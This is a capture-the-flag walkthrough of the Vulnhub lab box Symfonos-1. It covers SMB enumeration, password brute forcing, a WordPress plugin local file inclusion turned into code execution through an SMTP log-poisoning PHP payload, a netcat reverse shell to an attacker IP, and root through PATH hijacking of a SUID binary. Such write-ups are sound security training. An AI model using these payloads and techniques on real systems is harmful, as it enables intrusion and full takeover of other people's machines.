Vulnhub: Symfonos-1

This is the first box in the symfonos series. This series is really well done, and are reminiscent of the boxes on hackthebox, focusing more on exploits than puzzle-y stuff.

Scanning:

Find the device on the network with a port scan.

crazyeights@es-base:~$ nmap -PS 192.168.56.1-255

Nmap scan report for 192.168.56.132
Host is up (0.00019s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

More detailed scanning

Find specific information about the running services, and check uncommon ports (stripped unecessary details)

crazyeights@es-base:~$ nmap -A -p- 192.168.56.132

Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

Important Details: domain name - symfonos

Web:

I always check web first.
The index page:

Ran dirb on the site to check for other files and folders:

crazyeights@es-base:~$ dirb http://192.168.56.132
  • Found nothing

  • Downloaded the image to check for hidden text or files

Stego:

Using exiftool, found the painting name:

crazyeights@es-base:~/Downloads$ exiftool image.jpg 

File source: https://commons.wikimedia.org/wiki/File:Peter_Paul_Rubens_-_The_Fall_of_Phaeton_(National_Gallery_of_Art).jpg
  • I doubt thats important

  • Nothing else in the image

  • Moving on to SMB services

SMB:

Identify Null Shares

null shares - shares that you can connect to with username ‘’, and password ‘’

crazyeights@es-base:~$ smbclient -L \\symfonos -I 192.168.56.132 -N

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	helios          Disk      Helios personal share
	anonymous       Disk      
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available

Two interesting shares:

  • anonymous

  • helios

Identify what permissions we have for those shares:

crazyeights@es-base:~$ smbmap -H 192.168.56.132 -d symfonos
                                
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	helios                                            	NO ACCESS	Helios personal share
	anonymous                                         	READ ONLY	
	IPC$                                              	NO ACCESS	IPC Service (Samba 4.5.16-Debian)
crazyeights@es-base:~$ 

Try to connect to anonymous:

crazyeights@es-base:~$ smbclient \\\\symfonos\\anonymous -I 192.168.56.132 -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 21:14:49 2019
  ..                                  D        0  Fri Jun 28 21:12:15 2019
  attention.txt                       N      154  Fri Jun 28 21:14:49 2019

smb: \> get attention.txt 
getting file \attention.txt of size 154 as attention.txt (18.8 KiloBytes/sec) (average 18.8 KiloBytes/sec)

The file attention contains the following message:

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

This must mean there are users with weak passwords.

Finding users:

Using enum4linux we find the user helios:

crazyeights@es-base:~$ enum4linux 192.168.56.132

S-1-5-21-3173842667-3005291855-38846888-1000 SYMFONOS\helios (Local User)
S-1-22-1-1000 Unix User\helios (Local User)

Trying to crack helios’s password

Using the msf script smb_login we get helios’s password

msf5 > search smb_login

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login                   normal  No     SMB Login Check Scanner


msf5 > use 0
msf5 auxiliary(scanner/smb/smb_login) > options

msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE symfonos_user.txt
USER_FILE => symfonos_user.txt
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.56.132
RHOSTS => 192.168.56.132
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain symfonos
SMBDomain => symfonos
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE lists/rockyou-40.txt
PASS_FILE => lists/rockyou-40.txt
msf5 auxiliary(scanner/smb/smb_login) > exploit
[SNIP]
[+] 192.168.56.132:445    - 192.168.56.132:445 - Success: 'symfonos\helios:qwerty'
[*] 192.168.56.132:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Probably could have just checked each of the passwords in the file attention.txt

Login to the helios share:

crazyeights@es-base:~$ smbclient \\\\symfonos\\helios -I 192.168.56.132 -U 'helios'
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 20:32:05 2019
  ..                                  D        0  Fri Jun 28 20:37:04 2019
  research.txt                        A      432  Fri Jun 28 20:32:05 2019
  todo.txt                            A       52  Fri Jun 28 20:32:05 2019

		19994224 blocks of size 1024. 17295092 blocks available
smb: \> more todo.txt 
getting file \todo.txt of size 52 as /tmp/smbmore.z3DDVD (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \> more research.txt 
getting file \research.txt of size 432 as /tmp/smbmore.vlA0LD (20.1 KiloBytes/sec) (average 10.7 KiloBytes/sec)

Contents of research.txt:

Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.

Contents of todo.txt:

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

Go the directory h3l105 in browser, you get a wordpress

  • It looks wonky, fix it by setting hostname

  • Add the following line to /etc/hosts

192.168.56.132	symfonos.local

Enumerate Users:

Use wpscan to enumerate users:

crazyeights@es-base:~$ wpscan --url http://symfonos.local/h3l105/ -e u

There is only 1 user:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://symfonos.local/h3l105/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Crack admin password:

Tried various wordlists couldn’t get it

crazyeights@es-base:~$ wpscan --url http://symfonos.local/h3l105/ --passwords lists/rockyou-40.txt --usernames admin

Plugin Exploits:

  • Looking for unauthenticated wordpress exploits

  • There is two plugins (in wpscan output):

  • mail-masta version 1

  • site-editor version 1.1.1

Use searchsploit to identify exploits:

crazyeights@es-base:~$ searchsploit wordpress mail

WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                    | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection                                           | php/webapps/41438.txt

There are two exploits. Trying the LFI exploit:

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

  • We must now find a way to execute commands using this vulnerability.

  • Use Log Injection with SMTP

  • Add PHP code in the logs so it is executed when retrieved by the script that is being exploited.

  • I have never done this before, but it worked:

crazyeights@es-base:~$ telnet 192.168.56.132 25
Trying 192.168.56.132...
Connected to 192.168.56.132.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO dummy
250 symfonos.localdomain
MAIL FROM: "dummy <?php echo shell_exec($_GET['cmd']);?>"
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

data>
.
250 2.0.0 Ok: queued as 736B940698

If we open /var/mail/helios we can see the message:

Go helios’s mail log:

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id

We can now see the command results in the logs:

Now do the same with a reverse shell, using a nc reverse shell for simplicity:

nc -e /bin/sh 192.168.56.1 1234

Start the listener:

nc -lvp 1234

Go to the url with the cmd param equal to the reverse shell:

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/sh 192.168.56.1 1234

User:

We now have access as the user helios:

id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Looked for user flag found none.

Root:

Find programs helios can run as root:

find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping

The obvious standout is statuscheck

Checking out statuscheck:

cd /opt 

strings statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
[SNIP]

statuscheck runs curl as root using the system command

./statuscheck
HTTP/1.1 200 OK
Date: Fri, 01 Jan 2021 16:13:37 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html
  • If we can make another program named curl with a shell then we can get root

  • Create an executable curl in tmp, and put tmp first on the PATH

cd /tmp
echo "/bin/sh" > curl
chmod a+x curl
export PATH=/tmp:$PATH

When we run statuscheck now it runs our curl script instead of actual curl.

/opt/statuscheck
id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Root Flag:
cd /root
ls
proof.txt
cat proof.txt

Congrats on rooting symfonos:1!
[SNIPPED]

FIN. 🥳